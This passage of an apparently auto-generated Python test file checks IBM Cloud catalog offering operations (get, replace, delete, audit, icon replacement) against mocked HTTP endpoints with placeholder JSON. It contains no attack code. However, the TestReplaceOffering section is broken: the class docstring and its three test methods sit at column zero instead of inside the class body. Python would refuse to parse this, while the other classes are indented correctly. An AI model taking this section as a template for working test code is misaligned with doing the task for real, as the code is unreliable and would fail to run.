        mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
        responses.add(responses.GET, url, body=mock_response, content_type='application/json', status=200)

        # Set up parameter values.
        catalog_identifier = 'testString'
        offering_id = 'testString'

        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "offering_id": offering_id,
        }
        # Null out each required argument in turn and expect a ValueError.
        for missing in req_param_dict:
            call_args = dict(req_param_dict)
            call_args[missing] = None
            with pytest.raises(ValueError):
                _service.get_offering(**call_args)
class TestReplaceOffering():
"""
Test Class for replace_offering
"""
def preprocess_url(self, request_url: str):
    """
    Preprocess the request URL to ensure the mock response will be found.
    """
    # A URL ending in one or more slashes is matched through a regex that
    # tolerates any number of trailing slashes; other URLs match literally.
    if re.fullmatch('.*/+', request_url) is not None:
        return re.compile(request_url.rstrip('/') + '/+')
    return request_url
@responses.activate
def test_replace_offering_all_params(self):
    """
    replace_offering()
    """
    # Register a mocked PUT endpoint that replies with a canned Offering payload.
    url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString')
    mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
    responses.add(responses.PUT, url, body=mock_response, content_type='application/json', status=200)

    # Dict representation of a Rating model.
    rating_model = {
        'one_star_count': 38,
        'two_star_count': 38,
        'three_star_count': 38,
        'four_star_count': 38,
    }
    # Dict representation of a Feature model.
    feature_model = {
        'title': 'testString',
        'description': 'testString',
    }
    # Dict representation of a Configuration model.
    configuration_model = {
        'key': 'testString',
        'type': 'testString',
        'default_value': { 'foo': 'bar' },
        'value_constraint': 'testString',
        'description': 'testString',
        'required': True,
        'options': [{ 'foo': 'bar' }],
        'hidden': True,
    }
    # Dict representation of a Validation model.
    validation_model = {
        'validated': "2019-01-01T12:00:00Z",
        'requested': "2019-01-01T12:00:00Z",
        'state': 'testString',
        'last_operation': 'testString',
        'target': {},
    }
    # Dict representation of a Resource model.
    resource_model = {
        'type': 'mem',
        'value': { 'foo': 'bar' },
    }
    # Dict representation of a Script model.
    script_model = {
        'instructions': 'testString',
        'script': 'testString',
        'script_permission': 'testString',
        'delete_script': 'testString',
        'scope': 'testString',
    }
    # Dict representation of a VersionEntitlement model.
    version_entitlement_model = {
        'provider_name': 'testString',
        'provider_id': 'testString',
        'product_id': 'testString',
        'part_numbers': ['testString'],
        'image_repo_name': 'testString',
    }
    # Dict representation of a License model.
    license_model = {
        'id': 'testString',
        'name': 'testString',
        'type': 'testString',
        'url': 'testString',
        'description': 'testString',
    }
    # Dict representation of a State model.
    state_model = {
        'current': 'testString',
        'current_entered': "2019-01-01T12:00:00Z",
        'pending': 'testString',
        'pending_requested': "2019-01-01T12:00:00Z",
        'previous': 'testString',
    }
    # Dict representation of a Version model.
    version_model = {
        'id': 'testString',
        '_rev': 'testString',
        'crn': 'testString',
        'version': 'testString',
        'sha': 'testString',
        'created': "2019-01-01T12:00:00Z",
        'updated': "2019-01-01T12:00:00Z",
        'offering_id': 'testString',
        'catalog_id': 'testString',
        'kind_id': 'testString',
        'tags': ['testString'],
        'repo_url': 'testString',
        'source_url': 'testString',
        'tgz_url': 'testString',
        'configuration': [configuration_model],
        'metadata': {},
        'validation': validation_model,
        'required_resources': [resource_model],
        'single_instance': True,
        'install': script_model,
        'pre_install': [script_model],
        'entitlement': version_entitlement_model,
        'licenses': [license_model],
        'image_manifest_url': 'testString',
        'deprecated': True,
        'package_version': 'testString',
        'state': state_model,
        'version_locator': 'testString',
        'console_url': 'testString',
        'long_description': 'testString',
        'whitelisted_accounts': ['testString'],
    }
    # Dict representation of a Deployment model.
    deployment_model = {
        'id': 'testString',
        'label': 'testString',
        'name': 'testString',
        'short_description': 'testString',
        'long_description': 'testString',
        'metadata': {},
        'tags': ['testString'],
        'created': "2019-01-01T12:00:00Z",
        'updated': "2019-01-01T12:00:00Z",
    }
    # Dict representation of a Plan model.
    plan_model = {
        'id': 'testString',
        'label': 'testString',
        'name': 'testString',
        'short_description': 'testString',
        'long_description': 'testString',
        'metadata': {},
        'tags': ['testString'],
        'additional_features': [feature_model],
        'created': "2019-01-01T12:00:00Z",
        'updated': "2019-01-01T12:00:00Z",
        'deployments': [deployment_model],
    }
    # Dict representation of a Kind model.
    kind_model = {
        'id': 'testString',
        'format_kind': 'testString',
        'target_kind': 'testString',
        'metadata': {},
        'install_description': 'testString',
        'tags': ['testString'],
        'additional_features': [feature_model],
        'created': "2019-01-01T12:00:00Z",
        'updated': "2019-01-01T12:00:00Z",
        'versions': [version_model],
        'plans': [plan_model],
    }
    # Dict representation of a RepoInfo model.
    repo_info_model = {
        'token': 'testString',
        'type': 'testString',
    }

    # Exercise the operation with every optional property populated.
    response = _service.replace_offering(
        'testString',  # catalog_identifier
        'testString',  # offering_id
        id='testString',
        rev='testString',
        url='testString',
        crn='testString',
        label='testString',
        name='testString',
        offering_icon_url='testString',
        offering_docs_url='testString',
        offering_support_url='testString',
        tags=['testString'],
        keywords=['testString'],
        rating=rating_model,
        created=string_to_datetime('2019-01-01T12:00:00.000Z'),
        updated=string_to_datetime('2019-01-01T12:00:00.000Z'),
        short_description='testString',
        long_description='testString',
        features=[feature_model],
        kinds=[kind_model],
        permit_request_ibm_public_publish=True,
        ibm_publish_approved=True,
        public_publish_approved=True,
        public_original_crn='testString',
        publish_public_crn='testString',
        portal_approval_record='testString',
        portal_ui_url='testString',
        catalog_id='testString',
        catalog_name='testString',
        metadata={},
        disclaimer='testString',
        hidden=True,
        provider='testString',
        repo_info=repo_info_model,
        headers={}
    )

    # Exactly one HTTP request should have been issued, and it should succeed.
    assert len(responses.calls) == 1
    assert response.status_code == 200

    # Every property must survive serialization into the request body.
    req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
    assert req_body['id'] == 'testString'
    assert req_body['_rev'] == 'testString'
    assert req_body['url'] == 'testString'
    assert req_body['crn'] == 'testString'
    assert req_body['label'] == 'testString'
    assert req_body['name'] == 'testString'
    assert req_body['offering_icon_url'] == 'testString'
    assert req_body['offering_docs_url'] == 'testString'
    assert req_body['offering_support_url'] == 'testString'
    assert req_body['tags'] == ['testString']
    assert req_body['keywords'] == ['testString']
    assert req_body['rating'] == rating_model
    assert req_body['created'] == "2019-01-01T12:00:00Z"
    assert req_body['updated'] == "2019-01-01T12:00:00Z"
    assert req_body['short_description'] == 'testString'
    assert req_body['long_description'] == 'testString'
    assert req_body['features'] == [feature_model]
    assert req_body['kinds'] == [kind_model]
    assert req_body['permit_request_ibm_public_publish'] == True
    assert req_body['ibm_publish_approved'] == True
    assert req_body['public_publish_approved'] == True
    assert req_body['public_original_crn'] == 'testString'
    assert req_body['publish_public_crn'] == 'testString'
    assert req_body['portal_approval_record'] == 'testString'
    assert req_body['portal_ui_url'] == 'testString'
    assert req_body['catalog_id'] == 'testString'
    assert req_body['catalog_name'] == 'testString'
    assert req_body['metadata'] == {}
    assert req_body['disclaimer'] == 'testString'
    assert req_body['hidden'] == True
    assert req_body['provider'] == 'testString'
    assert req_body['repo_info'] == repo_info_model
@responses.activate
def test_replace_offering_required_params(self):
    """
    test_replace_offering_required_params()

    Exercise replace_offering with only the required path parameters.
    """
    # Register a PUT mock for the replace-offering endpoint.
    request_url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString')
    response_body = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
    responses.add(responses.PUT,
                  request_url,
                  body=response_body,
                  content_type='application/json',
                  status=200)

    # Required path parameters only.
    catalog_identifier = 'testString'
    offering_id = 'testString'

    # Invoke the operation with required params alone.
    service_response = _service.replace_offering(
        catalog_identifier,
        offering_id,
        headers={})

    # Exactly one HTTP call must have been made and it must succeed.
    assert len(responses.calls) == 1
    assert service_response.status_code == 200
@responses.activate
def test_replace_offering_value_error(self):
    """
    test_replace_offering_value_error()

    Verify that replace_offering raises ValueError whenever any one of
    its required parameters is None.
    """
    # Set up mock
    url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString')
    mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
    responses.add(responses.PUT,
                  url,
                  body=mock_response,
                  content_type='application/json',
                  status=200)
    # Set up parameter values
    catalog_identifier = 'testString'
    offering_id = 'testString'
    # Pass in all but one required param and check for a ValueError
    req_param_dict = {
        "catalog_identifier": catalog_identifier,
        "offering_id": offering_id,
    }
    for param in req_param_dict:
        # Compare keys by equality, not identity ('is'): string identity is
        # an interning accident and must not be relied on.
        req_copy = {key: None if key == param else val for (key, val) in req_param_dict.items()}
        with pytest.raises(ValueError):
            _service.replace_offering(**req_copy)
class TestDeleteOffering():
    """
    Test Class for delete_offering
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # URLs ending in one or more slashes are turned into a regex mock so
        # that requests with or without the trailing slash both match.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_delete_offering_all_params(self):
        """
        delete_offering()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString')
        responses.add(responses.DELETE,
                      url,
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        offering_id = 'testString'

        # Invoke method
        response = _service.delete_offering(
            catalog_identifier,
            offering_id,
            headers={})

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_delete_offering_value_error(self):
        """
        test_delete_offering_value_error()

        Each required parameter set to None must raise ValueError.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString')
        responses.add(responses.DELETE,
                      url,
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        offering_id = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "offering_id": offering_id,
        }
        for param in req_param_dict:
            # Equality, not identity: 'is' on strings is fragile.
            req_copy = {key: None if key == param else val for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.delete_offering(**req_copy)
class TestGetOfferingAudit():
    """
    Test Class for get_offering_audit
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # URLs ending in one or more slashes are turned into a regex mock so
        # that requests with or without the trailing slash both match.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_offering_audit_all_params(self):
        """
        get_offering_audit()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/audit')
        mock_response = '{"list": [{"id": "id", "created": "2019-01-01T12:00:00.000Z", "change_type": "change_type", "target_type": "target_type", "target_id": "target_id", "who_delegate_email": "who_delegate_email", "message": "message"}]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        offering_id = 'testString'

        # Invoke method
        response = _service.get_offering_audit(
            catalog_identifier,
            offering_id,
            headers={})

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_offering_audit_value_error(self):
        """
        test_get_offering_audit_value_error()

        Each required parameter set to None must raise ValueError.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/audit')
        mock_response = '{"list": [{"id": "id", "created": "2019-01-01T12:00:00.000Z", "change_type": "change_type", "target_type": "target_type", "target_id": "target_id", "who_delegate_email": "who_delegate_email", "message": "message"}]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        offering_id = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "offering_id": offering_id,
        }
        for param in req_param_dict:
            # Equality, not identity: 'is' on strings is fragile.
            req_copy = {key: None if key == param else val for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.get_offering_audit(**req_copy)
class TestReplaceOfferingIcon():
    """
    Test Class for replace_offering_icon
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # URLs ending in one or more slashes are turned into a regex mock so
        # that requests with or without the trailing slash both match.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_replace_offering_icon_all_params(self):
        """
        replace_offering_icon()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/offerings/testString/icon/testString')
        mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
        responses.add(responses.PUT,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        offering_id = 'testString'
        file_name = 'testString'

        # Invoke method
        response = _service.replace_offering_icon(
            catalog_identifier,
            offering_id,
            file_name,
            headers={})

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_replace_offering_icon_value_error(self):
        """
